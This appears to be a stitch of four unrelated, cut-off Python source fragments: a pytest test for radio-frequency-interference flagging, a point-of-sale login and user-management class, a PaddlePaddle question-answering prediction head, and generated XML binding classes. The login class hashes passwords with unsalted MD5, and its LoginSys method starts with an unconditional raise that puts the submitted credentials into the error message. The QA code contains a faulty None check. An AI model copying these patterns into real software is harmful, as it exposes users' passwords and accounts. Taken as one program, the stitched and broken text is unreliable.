sky, max_iter=10, threshold=5, use_median=False, which_bin="all"
)
# Only consider flags after bin 100 (since that's the bin width)
wrong = np.where(true_flags[100:] != flags[100:])[0]
print_wrongness(wrong, std, info, noise, true_flags, sky, rfi)
assert len(wrong) == 0
def test_watershed_last(self, sky_flat_1d):
with pytest.raises(ValueError):
xrfi.xrfi_model_sweep(sky_flat_1d, which_bin="last", watershed=4)
def test_giving_weights(self, sky_flat_1d):
sky, std, noise, rfi = make_sky(sky_flat_1d)
flags, info = xrfi.xrfi_model_sweep(
sky,
weights=np.ones_like(sky),
max_iter=10,
which_bin="all",
threshold=5,
use_median=True,
)
flags2, info2 = xrfi.xrfi_model_sweep(
sky, max_iter=10, which_bin="all", threshold=5, use_median=True
)
assert np.all(flags == flags2)
def make_sky(sky_model, rfi_model=np.zeros(NFREQ), scale=1000, rfi_amp=200):
std = | |
import hashlib
from mongoengine import Q
from mongoengine.connection import disconnect
import json
from sqlalchemy.orm import sessionmaker
from sqlalchemy.sql.expression import and_
from tools.DataBase.CodeGenerator import CodeGen
from tools.DataBase.Definition.Area import Area
from tools.DataBase.Definition.Contact import Contact
from tools.DataBase.Definition.Status import Status
from tools.DataBase.Definition.Type import Type
from tools.DataBase.Definition.User import User
from tools.DataBase.Definition.branch import Branch
from tools.DataBase.ODM.DataModelODM import SessionUser, UserInfo, UsertypeMenu, Module, waiterKey, UserArea, PreOrder, \
PreOrderTable, Group_module, group_module_asc, UserModule, cashbox, cashbox_open, UserCompany, rule_user
from tools.DataBase.Process import DBProcess
from tools.main import general
from tools.main.process import manContact
from tools.DataBase.Connect import conection
from sqlalchemy.sql import select
from tools.main.process.Accounts import Accounts
from tools.main.process.manContact import ManContact
from os import listdir
from os.path import isfile, join
class login:
def __init__(self):
self.connORM = conection().conORM()
self.status = 200
self.msg = None
self.type = "text/plain"
Session = sessionmaker(bind=self.connORM)
self.session = Session()
def UserRegistration(self, inputs):
"""The module, register users that
going to be added to the system."""
validation={"status":0}
if validation["status"] == 0:
#Crate the function that create the codes of the tables.
status_code = 12
userCode =0
if "contact" not in inputs:
inputs["code"]=ManContact().create({})["value"]["code"]
inputs["contact"]= ManContact().Handle(inputs)["value"]["code"]
inputs.pop("code", None)
if User.code.name not in inputs:
userCode = CodeGen().GenCode({"table": User.__tablename__})
#If the user type is 22, the information just will be save as an user.
userIns = User(username=inputs[User.username.name],
passwd=hashlib.md5(inputs[User.passwd.name].encode()).hexdigest(),
status=int(status_code), avatar="unknown.png",
usrtype=int(inputs[User.usrtype.name]),
code=userCode, contact=inputs[User.contact.name])
self.session.add(userIns)
else:
userCode = int(inputs[User.code.name])
if inputs["passwd"]!='':
dataInsert={User.username:inputs[User.username.name],
User.passwd:hashlib.md5(inputs[User.passwd.name].encode()).hexdigest(),
User.status:int(status_code), User.avatar:"unknown.png",
User.usrtype:int(inputs[User.usrtype.name]),
User.code:userCode, User.contact:inputs[User.contact.name]}
else:
dataInsert={User.username:inputs[User.username],
User.status:int(status_code), User.avatar:"unknown.png",
User.usrtype:int(inputs[User.usrtype.name]),
User.code:userCode, User.contact:inputs[User.contact.name]}
#If the user type is 22, the information just will be save as an user.
self.session.query(User).filter_by(code=int(inputs[User.code.name])).update\
(dataInsert)
self.session.commit()
self.session.close()
inputs["log_type"]=1
if "waiter_code" in inputs:
#Means that the user will be created a key for the waiter.
waiterKey.objects(user_code=userCode).update(set__status=12)
waiterKey(user_code=userCode, status=11, key=inputs["waiter_code"],
created_by=self.decLoginKey(inputs["key"]), created_date=general().date2julian()).save()
self.connORM.dispose()
self.session.close()
return {"status":200, "value":self.LoginSys(inputs)["value"], 'type':'application/json'}
else:
self.session.close()
self.connORM.dispose()
return {"status":500, "value":validation['msg'], 'type':'application/json'}
def confirmUsername(self, inputs):
# Basically this confirm the existnace of any username registred
user_info=self.session.query(User).filter_by(username=inputs[User.username.name]).first()
self.msg = {"response": 0}
if user_info!=None:
self.msg["response"]=1
self.msg[User.username.name]=inputs[User.username.name]
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": self.msg, 'type': 'application/json'}
def LoginWaiter(self, inputs):
waiterinfo = waiterKey.objects(key=inputs["waiter_code"], status=11).first()
if waiterinfo != None:
###First Close the session
self.closeAllSession(waiterinfo.user_code)
sessionUserID = CodeGen().GenCode({"table": "SessionUser"})
UserSess = SessionUser(userCode=waiterinfo.user_code, code=sessionUserID,
login=general().getJulian(), created_by=waiterinfo.user_code,
created_date=general().getJulian())
UserSess.save()
sessionID = str(UserSess.id)
profile = self.getProfile({"key": sessionID})["value"]
profile["key"] = sessionID
profile["orders"]=self.getOrdersByUser({"usercode":waiterinfo.user_code})["value"]
profile["modules"]=[]
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": profile, 'type': 'application/json'}
else:
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": {"error": 0}, 'type': 'application/json'}
def getOrdersByUser(self, inputs):
profile={0: []}
preorders = list(PreOrder.objects(status=11).values_list('code'))
for orders in preorders:
preorder_data = PreOrderTable.objects(preorder=orders).first()
if preorder_data != None:
# Attaching the order to the table.
profile[preorder_data.table_code] = [orders, preorder_data.tbl_name]
else:
# When there's no table, all the orders will be attach to the first area.
profile[0].append([orders])
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": profile, 'type': 'application/json'}
def checkPassword(self, inputs):
waiterinfo = waiterKey.objects(key=inputs["waiter_code"], status=11).first()
if waiterinfo != None:
###First Close the session
meta = {"db_alias": "default"}
profile = self.getProfile({"usercode": waiterinfo.user_code})["value"]
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": profile, 'type': 'application/json'}
else:
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": {"error": 0}, 'type': 'application/json'}
def create(self, inputs):
# This method will create an expense.
self.code = CodeGen().GenCode({"table": User.__tablename__, "column": User.code.name})
# Generating the code.
self.session.add(User(code=self.code, status=12))
# Saving
self.session.commit()
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": {User.code.name: self.code}, 'type': 'application/json'}
def Handle(self, inputs):
# This method will modify an expanse.
item = int(inputs[User.code.name])
if User.passwd.name in inputs: #Just if the passwd
inputs[User.passwd.name] = hashlib.md5(inputs[User.passwd.name].
encode()).hexdigest()
storeDict = {}
for column in DBProcess(User.user_tbl).getColumnDefinition:
if column["name"] in inputs:
storeDict[column["expr"]] = DBProcess(User.user_tbl).parse(column, inputs[column["name"]])
self.session.query(User).filter_by(code=item).update(storeDict)
self.session.commit()
self.session.close()
if "waiter_code" in inputs:
if len(inputs["waiter_code"])>=4:
# Means that the user will be created a key for the waiter.
waiterKey.objects(user_code=item).update(set__status=12)
waiterCode= CodeGen().GenCode({"table": "waiterKey", "column": "code"})
waiterKey(code=waiterCode, user_code=item, status=11, key=inputs["waiter_code"],
created_by=self.decLoginKey(inputs["key"]), created_date=general().date2julian()).save()
return {"status": 200, "value": {User.code.name: item}, 'type': 'application/json'}
def Get(self, inputs):
# This method gets the data, from the db.
storeDict = []
main_query = self.session.query(User, Status.description, Type.tpname,
Contact.contact_name,Contact.lastname).\
filter(and_(Status.code == User.status, Type.code == User.usrtype)).\
filter(Contact.code==User.contact)
if User.username.name in inputs:
main_query = main_query.\
filter(User.username.like("%" + inputs[User.username.name] + "%"))
if User.code.name in inputs:
main_query = main_query.\
filter(User.code == int(inputs[User.code.name]))
if User.status.name in inputs:
main_query = main_query.\
filter(Status.code == int(inputs[User.status.name]))
if User.usrtype.name in inputs:
main_query = main_query. \
filter(Type.code == int(inputs[User.usrtype.name]))
# The next area is in charge to extract the information,
# from the store Dict and add it to the dataCol to be returned
storeDict=main_query
dataCol = []
for dataLst in storeDict:
dicStore = {"status_name": dataLst._asdict()[Status.description.name],
Type.tpname.name: dataLst._asdict()[Type.tpname.name]}
for key in DBProcess(User.user_tbl).getColumnDefinition:
dataDict = dataLst._asdict()[User.__name__].__dict__ # Getting the dictionary of the list.
colname = key["name"] # Getting the column name.
if colname in dataDict and colname != User.passwd.name: # Just if the column name is on the dictionary, add it to the dictStore.
dicStore[colname] = DBProcess(User.user_tbl).parse2publish(dataDict[colname])
for key in DBProcess(Contact.Contact_tbl).getColumnDefinition:
dataDict = dataLst._asdict() # Getting the dictionary of the list.
colname = key["name"] # Getting the column name.
if colname in dataDict: # Just if the column name is on the dictionary, add it to the dictStore.
dicStore[colname] = DBProcess(Contact.Contact_tbl).parse2publish(dataDict[colname])
dataCol.append(dicStore)
# Appending everything to be returned
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": dataCol, 'type': 'application/json'}
def closeAllSession(self, idUser):
meta = {"db_alias": "default"}
#This module will close all the sessions if there is one open.
SessionUser.objects(userCode=idUser).update(set__status=32)
def getProfile(self, inputs):
# Method that retrives the profile of a user.
userData = {}
meta = {"db_alias": "default"}
key = ""
if "key" in inputs:
userData["id"] = self.decLoginKey(inputs["key"])
elif "usercode" in inputs:
userData["id"] = int(inputs["usercode"])
getUserID = self.session.query(User.code, User.avatar, User.usrtype,
Branch.altpath, Contact.email, Contact.contact_name). \
filter(User.code == userData["id"]).\
filter(Contact.code == User.contact). \
filter(User.branch == Branch.code). \
first()
if getUserID != None:
userData["type"] = getUserID.usrtype
userData["cashbox"] = None # By default is None
cashbox_info = cashbox.objects(user_owner=getUserID.code).first()
if cashbox_info != None:
cashBoxcur = cashbox_open.objects.filter(
Q(cashbox=cashbox_info.code) & (Q(status=11) | Q(status=17))).first()
if cashBoxcur != None:
userData["cashbox"] = cashBoxcur.code
userData["code"] = getUserID.code
userData["avatar"] = getUserID.avatar
userData["email"] = getUserID.email
userData["copies"]=0
userData["altpath"]=getUserID.altpath
userData["companies"] = json.loads(UserCompany.objects(user_code=getUserID.code).to_json())
userData["areas"] =[]
for company in userData["companies"]:
data = self.session.query(Area).filter(Area.company == company["company"])
for piece in data:
del piece.__dict__['_sa_instance_state']
userData["areas"].append(piece.__dict__)
userData["paytypes"] = Accounts().getPayType({})["value"]
userData["billtypes"] = Accounts().getBillType({})["value"]
userData["name"] = getUserID.contact_name
userData["rules"]=json.loads(rule_user.objects(user_code=getUserID.code).to_json())
else:
userData["type"] = ""
userData["avatar"] = ""
userData["paytypes"] = []
userData["rules"]=[]
userData["billtypes"] = []
userData["email"] = ""
userData["name"] = ""
userData["altpath"]=""
self.session.close()
self.connORM.dispose()
return {"status": 200, "value": userData, 'type': 'application/json'}
def LoginSys(self, inputs):
sessionID = 0
validation = {"status":0}
raise Exception(str(inputs))
#When all the validations, are passed now the work.
###Close the session.
if validation["status"] > 0:
return {"status":500, "value":validation['msg'], 'type':'application/json'}
userData={}
#This means that login with the system.
getUserID = self.session.query(User.code, User.avatar, User.usrtype, Contact.email, Contact.contact_name).\
filter(User.username == inputs["username"]).filter(
User.passwd == hashlib.
md5(inputs["passwd"].encode()).hexdigest()).filter(Contact.code == User.contact).\
first()
if getUserID ==None:
return {"status":200, "value":{"error":0}, 'type':'application/json'}
###First Close the session
self.closeAllSession(getUserID.code)
meta = {"db_alias": "default"}
sessionUserID = CodeGen().GenCode({"table": "SessionUser"})
UserSess = SessionUser(userCode=getUserID.code, code=sessionUserID,
login=general().getJulian(), created_by=getUserID.code,
created_date=general().getJulian())
UserSess.save()
sessionID = str(UserSess.id)
profile=self.getProfile({"key": sessionID})
profile["key"] = sessionID
self.session.close()
self.connORM.dispose()
disconnect()
return {"status":200, "value":profile, 'type':'application/json'}
def LoginRoot(self, inputs):
#The login to verify if the owner of the account is this person.
sessionID = 0
validation = {"status":0}
#When all the validations, are passed now the work.
###Close the session.
if validation["status"] > 0:
return {"status":500, "value":validation['msg'],
'type':'application/json'}
userData={}
#This means that login with the system.
getUserID = self.session.query(User.code, User.avatar,
User.usrtype, Contact.email,
Contact.contact_name, User.owner).\
filter(User.username == inputs["username"]).filter(
User.passwd == hashlib.
md5(inputs["passwd"].encode()).hexdigest()).\
filter(Contact.code == User.contact).\
filter(User.owner == True).\
first()
if getUserID ==None:
return {"status":200, "value":{"error":0}, 'type':'application/json'}
###First Close the session
self.closeAllSession(getUserID.code)
meta = {"db_alias": "default"}
sessionUserID = CodeGen().GenCode({"table": "SessionUser"})
UserSess = SessionUser(userCode=getUserID.code, code=sessionUserID,
login=general().getJulian(), created_by=getUserID.code,
created_date=general().getJulian())
UserSess.save()
sessionID = str(UserSess.id)
profile=self.getProfile({"key": sessionID})
profile["key"] = sessionID
self.session.close()
self.connORM.dispose()
return {"status":200, "value":profile, 'type':'application/json'}
def decLoginKey(self, key):
meta = {"db_alias": "default"}
try:
UserSess = SessionUser.objects.get(id=key, logout=None)
return UserSess.userCode
except:
return None
def getUsersBy(self, inputs):
meta = {"db_alias": "default"}
userData = self.session.query(User.code, User.username,
Contact.contact_name, Contact.lastname, Contact.email, User.usrtype). \
filter(User.contact == Contact.code)
if "usertype" in inputs:
userData=userData.filter(User.usrtype==int(inputs["usertype"]))
elif "user" in inputs:
userData = userData.filter(User.code==int(inputs["user"]))
userLst =[]
for piece in userData:
lastname=""
if piece.lastname!=None:
lastname=piece.lastname
name=""
if piece.contact_name!=None:
name=piece.contact_name
userLst.append({"name":name+" "+lastname, "code":piece.code, "username":piece.username,
"email":piece.email,"type":piece.usrtype})
#userData.close()
self.session.close()
self.connORM.dispose()
return {"status":200, "value":userLst, 'type':'application/json'}
def getuserModule(self, inputs):
#Get the menu from a profile
meta = {"db_alias": "default"}
profile=self.getProfile(inputs)["value"]
dtype="text/html" # Data Type.
if "datatype" in inputs:
dtype = inputs["datatype"]
| |
logits.
This matrix corresponds to a single sample (includes special tokens, question tokens, passage tokens).
This method always returns a list of len n_best_per_sample + 1 (it is comprised of the n_best_per_sample positive answers along with the one no_answer)
"""
# Initialize some variables
top_candidates: List[QACandidate] = []
n_candidates = sorted_candidates.shape[0]
start_idx_candidates = set()
end_idx_candidates = set()
start_matrix_softmax_start = F.softmax(start_matrix[:, 0], axis=-1)
end_matrix_softmax_end = F.softmax(end_matrix[0, :], axis=-1)
# Iterate over all candidates and break when we have all our n_best candidates
for candidate_idx in range(n_candidates):
if len(top_candidates) == self.n_best_per_sample:
break
# Retrieve candidate's indices
start_idx = sorted_candidates[candidate_idx, 0].item()
end_idx = sorted_candidates[candidate_idx, 1].item()
# Ignore no_answer scores which will be extracted later in this method
if start_idx == 0 and end_idx == 0:
continue
if self.duplicate_filtering > -1 and (
start_idx in start_idx_candidates or
end_idx in end_idx_candidates):
continue
score = start_end_matrix[start_idx, end_idx].item()
confidence = (start_matrix_softmax_start[start_idx].item() +
end_matrix_softmax_end[end_idx].item()) / 2
top_candidates.append(
QACandidate(
offset_answer_start=start_idx,
offset_answer_end=end_idx,
score=score,
answer_type="span",
offset_unit="token",
aggregation_level="passage",
passage_id=str(sample_idx),
confidence=confidence, ))
if self.duplicate_filtering > -1:
for i in range(0, self.duplicate_filtering + 1):
start_idx_candidates.add(start_idx + i)
start_idx_candidates.add(start_idx - i)
end_idx_candidates.add(end_idx + i)
end_idx_candidates.add(end_idx - i)
no_answer_score = start_end_matrix[0, 0].item()
no_answer_confidence = (start_matrix_softmax_start[0].item() +
end_matrix_softmax_end[0].item()) / 2
top_candidates.append(
QACandidate(
offset_answer_start=0,
offset_answer_end=0,
score=no_answer_score,
answer_type="no_answer",
offset_unit="token",
aggregation_level="passage",
passage_id=None,
confidence=no_answer_confidence, ))
return top_candidates
def formatted_preds_wrapper(self, logits: paddle.Tensor, **kwargs):
"""
Format predictions for inference.
:param logits: Model logits.
:return: Predictions in the right format.
"""
preds_final = []
# This try catch is to deal with the fact that sometimes we collect preds before passing it to
# formatted_preds (see Inferencer._get_predictions_and_aggregate()) and sometimes we don't
# (see Inferencer._get_predictions())
try:
preds = kwargs["preds"]
temp = preds
preds_flat = [item for sublist in temp for item in sublist]
kwargs["preds"] = preds_flat
except KeyError:
kwargs["preds"] = None
logits_for_head = logits[0]
preds = self.formatted_preds(logits=logits_for_head, **kwargs)
# TODO This is very messy - we need better definition of what the output should look like
if type(preds) == list:
preds_final += preds
elif type(preds) == dict and "predictions" in preds:
preds_final.append(preds)
return preds_final
def formatted_preds(self,
preds: List[QACandidate],
baskets: List[SampleBasket],
logits: Optional[paddle.Tensor]=None,
**kwargs):
"""
Takes a list of passage level predictions, each corresponding to one sample, and converts them into document level
predictions. Leverages information in the SampleBaskets. Assumes that we are being passed predictions from
ALL samples in the one SampleBasket i.e. all passages of a document. Logits should be None, because we have
already converted the logits to predictions before calling formatted_preds.
(see Inferencer._get_predictions_and_aggregate()).
"""
# Unpack some useful variables
# passage_start_t is the token index of the passage relative to the document (usually a multiple of doc_stride)
# seq_2_start_t is the token index of the first token in passage relative to the input sequence (i.e. number of
# special tokens and question tokens that come before the passage tokens)
if logits or preds is None:
logger.error(
"QuestionAnsweringHead.formatted_preds() expects preds as input and logits to be None \
but was passed something different")
samples = [s for b in baskets for s in b.samples] # type: ignore
ids = [s.id for s in samples]
passage_start_t = [s.features[0]["passage_start_t"]
for s in samples] # type: ignore
seq_2_start_t = [s.features[0]["seq_2_start_t"]
for s in samples] # type: ignore
# Aggregate passage level predictions to create document level predictions.
# This method assumes that all passages of each document are contained in preds
# i.e. that there are no incomplete documents. The output of this step
# are prediction spans
preds_d = self.aggregate_preds(preds, passage_start_t, ids,
seq_2_start_t)
# Separate top_preds list from the no_ans_gap float.
top_preds, no_ans_gaps = zip(*preds_d)
# Takes document level prediction spans and returns string predictions
doc_preds = self.to_qa_preds(top_preds, no_ans_gaps, baskets)
return doc_preds
def to_qa_preds(self, top_preds, no_ans_gaps, baskets):
"""
Groups Span objects together in a QAPred object
"""
ret = []
# Iterate over each set of document level prediction
for pred_d, no_ans_gap, basket in zip(top_preds, no_ans_gaps, baskets):
# Unpack document offsets, clear text and id
token_offsets = basket.raw["document_offsets"]
pred_id = basket.id_external if basket.id_external else basket.id_internal
# These options reflect the different input dicts that can be assigned to the basket
# before any kind of normalization or preprocessing can happen
question_names = ["question_text", "qas", "questions"]
doc_names = ["document_text", "context", "text"]
document_text = try_get(doc_names, basket.raw)
question = self.get_question(question_names, basket.raw)
ground_truth = self.get_ground_truth(basket)
curr_doc_pred = QAPred(
id=pred_id,
prediction=pred_d,
context=document_text,
question=question,
token_offsets=token_offsets,
context_window_size=self.context_window_size,
aggregation_level="document",
ground_truth_answer=ground_truth,
no_answer_gap=no_ans_gap, )
ret.append(curr_doc_pred)
return ret
def aggregate_preds(self,
preds,
passage_start_t,
ids,
seq_2_start_t=None,
labels=None):
"""
Aggregate passage level predictions to create document level predictions.
This method assumes that all passages of each document are contained in preds
i.e. that there are no incomplete documents. The output of this step
are prediction spans. No answer is represented by a (-1, -1) span on the document level
"""
# Initialize some variables
n_samples = len(preds)
all_basket_preds = {}
all_basket_labels = {}
# Iterate over the preds of each sample - remove final number which is the sample id and not needed for aggregation
for sample_idx in range(n_samples):
basket_id = ids[sample_idx]
basket_id = basket_id.split("-")[:-1]
basket_id = "-".join(basket_id)
# curr_passage_start_t is the token offset of the current passage
# It will always be a multiple of doc_stride
curr_passage_start_t = passage_start_t[sample_idx]
# This is to account for the fact that all model input sequences start with some special tokens
# and also the question tokens before passage tokens.
if seq_2_start_t:
cur_seq_2_start_t = seq_2_start_t[sample_idx]
curr_passage_start_t -= cur_seq_2_start_t
# Converts the passage level predictions+labels to document level predictions+labels. Note
# that on the passage level a no answer is (0,0) but at document level it is (-1,-1) since (0,0)
# would refer to the first token of the document
# pred1, pred2 = preds[sample_idx]
pred_d = self.pred_to_doc_idxs(preds[sample_idx],
curr_passage_start_t, sample_idx)
if labels:
label_d = self.label_to_doc_idxs(labels[sample_idx],
curr_passage_start_t)
# Initialize the basket_id as a key in the all_basket_preds and all_basket_labels dictionaries
if basket_id not in all_basket_preds:
all_basket_preds[basket_id] = []
all_basket_labels[basket_id] = []
# Add predictions and labels to dictionary grouped by their basket_ids
# passage-level -> document-level
all_basket_preds[basket_id].append(pred_d)
if labels:
all_basket_labels[basket_id].append(label_d)
# Pick n-best predictions and remove repeated labels
idx = 0
for k, v in all_basket_preds.items():
pred1, pred2 = v[0]
all_basket_preds[k] = self.reduce_preds(v)
idx += 1
# all_basket_preds = {k: self.reduce_preds(v) for k, v in all_basket_preds.items()}
if labels:
all_basket_labels = {
k: self.reduce_labels(v)
for k, v in all_basket_labels.items()
}
# Return aggregated predictions in order as a list of lists
keys = [k for k in all_basket_preds]
aggregated_preds = [all_basket_preds[k] for k in keys]
if labels:
labels = [all_basket_labels[k] for k in keys]
return aggregated_preds, labels
else:
return aggregated_preds
@staticmethod
def pred_to_doc_idxs(pred, passage_start_t, sample_idx):
"""
Converts the passage level predictions to document level predictions. Note that on the doc level we
don't have special tokens or question tokens. This means that a no answer
cannot be prepresented by a (0,0) qa_answer but will instead be represented by (-1, -1)
"""
new_pred = []
for qa_answer in pred:
start = qa_answer.offset_answer_start
end = qa_answer.offset_answer_end
if start == 0:
start = -1
else:
start += passage_start_t
if start < 0:
logger.error("Start token index < 0 (document level)")
if end == 0:
end = -1
else:
end += passage_start_t
if end < 0:
logger.error("End token index < 0 (document level)")
qa_answer.to_doc_level(start, end)
new_pred.append(qa_answer)
return new_pred
def reduce_preds(self, preds):
"""
This function contains the logic for choosing the best answers from each passage. In the end, it
returns the n_best predictions on the document level.
"""
# Initialize variables
passage_no_answer = []
passage_best_score = []
passage_best_confidence = []
no_answer_scores = []
no_answer_confidences = []
n_samples = len(preds)
# Iterate over the top predictions for each sample
# Note: preds: [[QACandidate, QACandidate]]
for sample_idx, sample_preds in enumerate(preds):
best_pred = sample_preds[0]
best_pred_score = best_pred.score
best_pred_confidence = best_pred.confidence
no_answer_score, no_answer_confidence = self.get_no_answer_score_and_confidence(
sample_preds)
no_answer_score += self.no_ans_boost
# TODO we might want to apply some kind of a no_ans_boost to no_answer_confidence too
| |
for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
TypeBase64 = 8
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace,
pretty_print=True):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(
outfile, level, namespace, name_=name,
pretty_print=pretty_print)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
outfile.write('<%s>%s</%s>' % (
self.name,
base64.b64encode(self.value),
self.name))
def to_etree(self, element, mapping_=None, nsmap_=None):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(
element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self, mapping_=None, nsmap_=None):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s",\n' % (
self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0,
optional=0, child_attrs=None, choice=None):
self.name = name
self.data_type = data_type
self.container = container
self.child_attrs = child_attrs
self.choice = choice
self.optional = optional
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def set_child_attrs(self, child_attrs): self.child_attrs = child_attrs
def get_child_attrs(self): return self.child_attrs
def set_choice(self, choice): self.choice = choice
def get_choice(self): return self.choice
def set_optional(self, optional): self.optional = optional
def get_optional(self): return self.optional
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class booleanEnum(str, Enum):
N='N'
Y='Y'
class cashTypeEnum(str, Enum):
_0='0'
_1='1'
class productTypeEnum(str, Enum):
N='N'
D='D'
class senderReceiverEnum(str, Enum):
S='S'
R='R'
class consignmentIdentityType(GeneratedsSuper):
"""This element contains a consignment number and optional customer
reference.
These values are used to distinguish a consignment from any other
consignment.
This value appears on a routing label and is used as the key for a
consignment."""
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, consignmentNumber=None, customerReference=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
self.consignmentNumber = consignmentNumber
self.consignmentNumber_nsprefix_ = None
self.customerReference = customerReference
self.customerReference_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, consignmentIdentityType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if consignmentIdentityType.subclass:
return consignmentIdentityType.subclass(*args_, **kwargs_)
else:
return consignmentIdentityType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_consignmentNumber(self):
return self.consignmentNumber
def set_consignmentNumber(self, consignmentNumber):
self.consignmentNumber = consignmentNumber
def get_customerReference(self):
return self.customerReference
def set_customerReference(self, customerReference):
self.customerReference = customerReference
def hasContent_(self):
if (
self.consignmentNumber is not None or
self.customerReference is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='consignmentIdentityType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('consignmentIdentityType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'consignmentIdentityType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='consignmentIdentityType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='consignmentIdentityType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='consignmentIdentityType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='consignmentIdentityType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.consignmentNumber is not None:
namespaceprefix_ = self.consignmentNumber_nsprefix_ + ':' if (UseCapturedNS_ and self.consignmentNumber_nsprefix_) else ''
showIndent(outfile, level, pretty_print)
outfile.write('<%sconsignmentNumber>%s</%sconsignmentNumber>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.consignmentNumber), input_name='consignmentNumber')), namespaceprefix_ , eol_))
if self.customerReference is not None:
namespaceprefix_ = self.customerReference_nsprefix_ + ':' if (UseCapturedNS_ and self.customerReference_nsprefix_) else ''
showIndent(outfile, level, pretty_print)
outfile.write('<%scustomerReference>%s</%scustomerReference>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.customerReference), input_name='customerReference')), namespaceprefix_ , eol_))
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
